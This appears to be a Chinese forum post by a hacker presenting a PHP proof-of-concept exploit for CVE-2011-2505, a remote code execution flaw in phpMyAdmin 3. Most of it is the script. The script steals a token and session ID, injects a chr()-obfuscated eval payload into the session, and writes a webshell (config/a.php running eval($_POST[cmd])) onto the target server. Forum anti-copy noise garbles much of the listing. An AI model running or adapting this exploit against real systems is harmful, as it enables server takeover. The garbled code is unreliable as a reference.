最近在家做专职奶爸,不谙圈内事很多months了,博客也无更新。
昨夜带孩子整夜未眠,看到黑哥在php security群里关于phpmyadmin3漏洞的讨论,虽然之前没看过漏洞代码,不过前段时间还是在微博上看到wofeiwo的exp了,不过据黑哥说有不鸡肋的利用方法,于是夜里翻代码出来研究了翻,写出了这个冷饭exp,由于我搞的晚了,之前已经很多人研究了写exp了,于是我这个属于炒冷饭,权当研究研究打发时间了。
首先赞下wofeiwo的python版本的exp,再赞下wofeiwo跟superhei的钻研精神,学习的榜样啊。不过之前那个exp利用起来是有一些限制的:
一是session.auto_start = 1;
二是pma3默认代码里libraries目录已经用.htaccess控制了不允许访问。
当然还有第三点大家都不可以逾越的鸿沟:config目录存在且可写。
在群里看了黑哥的发言后,再看了下代码,发现前两点利用限制均可以无视。所以其实这个漏洞还真的可以不是那么鸡肋。
5 E" B) r" \, C. X1 n; Q d6 _% r# G$ t+ N
于是写了这个php版本的exp,代码如下:
% `( H& W' |; M1 W#!/usr/bin/php5 K! p' Z! H9 K( \ n$ R1 D
<?php4 O( E6 {8 d& f( X$ m
// Banner. Published proof of concept for CVE-2011-2505 in phpMyAdmin 3; the
// listing as printed here is interleaved with forum anti-copy noise and is not
// valid PHP without cleanup.
print_r('0 y, p+ V+ E4 I, `
+---------------------------------------------------------------------------+- ^! k# A: V$ b6 O b, X' Z' v1 T
pma3 - phpMyAdmin3 remote code execute exploit [Not jilei(chicken\'s ribs)]
. F* t! n; |" Z- X; Gby oldjun(www.oldjun.com)4 v8 J5 R2 v, w& Q
welcome to www.t00ls.net
! ^* N% Y) o) v/ t' w- qmail: oldjun@gmail.com$ J8 J6 r' Z \8 L
Assigned CVE id: CVE-2011-2505" k3 J+ ?. N6 F# ~8 m) V8 l
+---------------------------------------------------------------------------+$ f8 v* d6 f$ h# T% s
');
; X) H) `; u. B1 o. S2 U
" @9 ^$ K- u# E6 f/**. q# T1 y( ]5 [+ }5 o+ R
* working when the directory:"config" exists and is writeable.8 o, m! d# n- F" X
**/
// Usage guard: host and path are mandatory, and everything after this point
// trusts both values verbatim. The example shows path ending in "/", which
// php_request() relies on when it concatenates $path.$url into the request line.
if ($argc < 3) {) H- n9 Z1 x2 W1 P& F; i
print_r('# v8 U4 c4 l$ h4 T+ _
+---------------------------------------------------------------------------+0 p6 b7 H1 d9 \5 D9 k3 r
Usage: php '.$argv[0].' host path d" d) |5 A" f1 x# P
host: target server (ip/hostname)7 w5 G* H; x3 k
path: path to pma3
9 I. h& e9 d- j( V6 W) B! @Example:/ ~$ X. g8 m# N. Z
php '.$argv[0].' localhost /pma/9 s; Y% h7 c* D9 ~9 a$ y/ V
+---------------------------------------------------------------------------+
M) ?; s9 \1 e) W( e& H');
9 y, F" z X$ @( u exit;
" K/ g3 ?5 E/ d; L+ m% E6 C}6 U' Q% `% i: G/ k% ]: e1 x- A
// Target host and application path, taken from argv without validation and
// read by php_request() through 'global': $host goes into the Host header and
// the DNS lookup, $path is prefixed to every request line.
$host = $argv[1];/ W9 s/ W! z, Y, R9 S5 `
$path = $argv[2];! i* [) u) i9 W9 d
3 Z; E/ [" t a, a" x5 u/**2 ^9 @5 F+ `) t8 ]$ `& i; d
* Try to determine if the directory:"config" exists
9 R! w% a( m4 K. n* C$ G**/& `( h# S3 g" L& f/ h
echo "[+] Try to determine if the directory:config exists....\n";
" o, o7 C6 O9 b8 @! W$returnstr=php_request('config/');
9 y: Y8 R0 N1 r, Fif(strpos($returnstr,'404')){
6 |1 ~/ q8 B. d2 C& k4 H) X% f0 c exit("[-] Exploit Failed! The directory:config do not exists!\n");
; j( o/ E% ~, i; v/ @" w5 d) f0 O7 ~}- u0 I' B! I& Z8 |3 P
/**
 * Try to get the token and session id.
 **/
echo "[+] Try to get token and sessionid....\n";
' U5 X u- @: D N! p$result=php_request('index.php');3 L& F1 c4 W7 W/ e0 e' V
preg_match('/phpMyAdmin=(\w{32,40})\;(.*?)token=(\w{32})\&/s', $result, $resp);7 S9 Z- `" H1 w% m V" |
$token=$resp[3];' }/ p' a: E4 ~3 Q
$sessionid=$resp[1];6 b, O$ x0 B' _# |2 a' K+ a6 g* b
if($token && $sessionid){5 v9 Q$ X' U% ?, p4 j V; L5 l- v0 Z
echo "[+] token token\n";
8 o* t; j/ q3 Y, `: e echo "[+] Session ID sessionid\n";
9 n: C0 A# j5 R1 a}else{
/ |) I4 ]9 y( m+ G. i# n, _ exit("[-] Can't get token and Session ID,Exploit Failed!\n");
$ k( L( l4 h, b. z) y}
/**
 * Try to insert the shell into the session.
 **/
echo "[+] Try to insert shell into session....\n";
6 D' I8 l/ ]+ M, o/ ]: }php_request('db_create.php?token='.$token.'&session_to_unset=t00ls&_SESSION[ConfigFile][Servers][*/eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(39).chr(97).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).chr(39).chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(109).chr(100).chr(93).chr(41).chr(63).chr(62).chr(39).chr(41).chr(59).chr(101).chr(99).chr(104).chr(111).chr(40).chr(39).chr(116).chr(48).chr(48).chr(108).chr(115).chr(39).chr(41).chr(59));/*][host]=t00ls.net','','phpMyAdmin='.$sessionid);//Actually,almost all the php files in home directory of pma3 can be used here.2 c/ ^0 x9 a. J$ W5 W; J+ B5 H6 V; @1 {- r
/**
 * Try to create the webshell.
 **/
echo "[+] Try to create webshell....\n";+ v/ S) ], A$ b- X
php_request('setup/config.php','phpMyAdmin='.$sessionid.'&tab_hash=&token='.$token.'&check_page_refresh=&DefaultLang=en&ServerDefault=0&eol=unix&submit_save=Save','phpMyAdmin='.$sessionid);
/**
 * Try to check whether the webshell was created successfully.
 **/
// Step 5: verify by fetching config/config.inc.php and looking for the marker
// string; same strpos() position-0 caveat as the config/ probe. Forensic
// artefacts of a successful run: config/config.inc.php containing "t00ls" and
// config/a.php (the path printed below). Removing config/ after setup, as the
// header's precondition implies, prevents both from being written.
q/ K: U; ]2 v4 @1 T. i) v6 fecho "[+] Try to check if the webshell was created successfully....\n";+ N8 ~1 o3 T* _$ a0 Y' C7 J
$content=php_request('config/config.inc.php');
3 o* \$ U- _) Wif(strpos($content,'t00ls')){$ T1 ?5 i1 b. x& ~0 _& P& ?
echo "[+] Congratulations! Expoilt successfully....\n";
- T$ m- P9 E ?8 u9 r echo "[+] Webshell:http://$host{$path}config/a.php eval(\$_POST[cmd])\n";
3 O9 v, V/ {0 J7 d+ R1 @' k6 ^, \}else{8 `2 X8 c0 L* Y9 i( a9 r
exit("[-] Exploit Failed! Perhaps the directory:config do not exists or is not writeable!\n");
z1 P0 q: `4 ]4 A* R}
1 B" E! \0 t6 D3 R$ _- l3 A1 w6 z" {6 r4 W- s6 q' Y
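/**
 * Send one plain-HTTP/1.1 request to the target and return the raw response.
 *
 * The request line is "$path$url" with no normalisation ($path is expected to
 * end in "/"), the Host header is taken from the global $host, and the whole
 * raw response -- status line, headers and body -- comes back as one string;
 * callers search it with strpos().
 *
 * @param string $url    Path relative to $path (may carry a query string).
 * @param string $data   Form-encoded body; a non-empty body switches the
 *                       method to POST and adds Content-Type/Content-Length.
 * @param string $cookie Raw Cookie header value; omitted when empty.
 * @param int    $port   TCP port to connect to (default 80, plain HTTP only).
 * @return string Raw HTTP response. Terminates the script with a message when
 *                the TCP connection cannot be opened.
 */
function php_request($url, $data = '', $cookie = '', $port = 80) {
    global $host, $path;

    // Presence of a body, not its truthiness, decides the method: testing
    // "$data ?" would send the body "0" as a GET without Content-Length.
    $has_body = ($data !== '');
    $method   = $has_body ? 'POST' : 'GET';

    $lines = array(
        $method . " " . $path . $url . " HTTP/1.1",
        "Accept: */*",
        "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)",
        "Host: $host",
    );
    if ($has_body) {
        $lines[] = "Content-Type: application/x-www-form-urlencoded";
        $lines[] = "Content-Length: " . strlen($data);
    }
    if ($cookie !== '') {
        $lines[] = "Cookie: $cookie";
    }
    // "Connection: Close" lets the read loop below end on EOF instead of
    // waiting for a keep-alive connection to time out.
    $lines[] = "Connection: Close";
    $packet  = implode("\r\n", $lines) . "\r\n\r\n" . ($has_body ? $data : "");

    // Plain TCP; $host comes straight from argv and is resolved here, so a
    // name that does not resolve simply fails to connect.
    $fp = fsockopen(gethostbyname($host), $port);
    if (!$fp) {
        echo 'No response from ' . $host;
        die;
    }

    fwrite($fp, $packet);
    $resp = '';
    while (!feof($fp)) {
        $resp .= fread($fp, 1024);
    }
    // The original never closed the socket, leaking one descriptor per request.
    fclose($fp);

    return $resp;
}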
?> 3 o# B' q2 E2 [, v, ^3 g